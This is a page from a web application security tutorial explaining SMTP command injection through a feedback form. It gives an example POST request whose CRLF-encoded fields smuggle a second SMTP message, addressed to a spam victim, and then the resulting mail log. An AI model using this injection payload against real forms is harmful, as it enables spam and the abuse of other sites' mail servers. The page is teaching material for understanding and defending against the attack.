Web application security - the fast guide 1.1 | Page 147

Chapter 7 - Attack execution (3)
P a g e | 147
The main difference with previous header manipulation approach is the fact that
you can pass SMTP commands which will give the attacker the opportunity to
send another MAIL From command getting the full control over totally new
message.
As example let’s say that the attacker injects the following input benefitting of
course from the improper input validation.
POST feedback.php HTTP/1.1
Host: vulnerableApp.com
Content-Length: 266
From=legitimateSender@legMailServer.com&Subject=Site+feedback%0d%0a
any message%0d%0a%2e%0d
%0aMAIL+FROM:+mail@attacker-
viagra.com%0d%0aRCPT+TO:+victim@spamVictim.com%0d%0aDATA%0d%0a
From:+ mail@attacker-viagra.com%0d%0aTo:+ spamVictim@spamVictim.com
.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Me
ssage=spam message contents
The resulting SMTP communication log will be
MAIL FROM: legitimateSender@legMailServer.com
RCPT TO: feedback@ vulnerableApp.com
DATA
From: legitimateSender@legMailServer.com
To: feedback@vulnerableApp.com
Subject: Site+feedback
any message
.
MAIL FROM: mail@attacker-viagra.com
RCPT TO: victim@spamVictim.com
DATA
From: mail@attacker-viagra.com
To: victim@spamVictim.com
Subject: Cheap V1AGR4
Blah
.
spam message contents
.
It is quite clear that two messages will be sent on is a legitimate one and the
second is totally controlled by the attacker.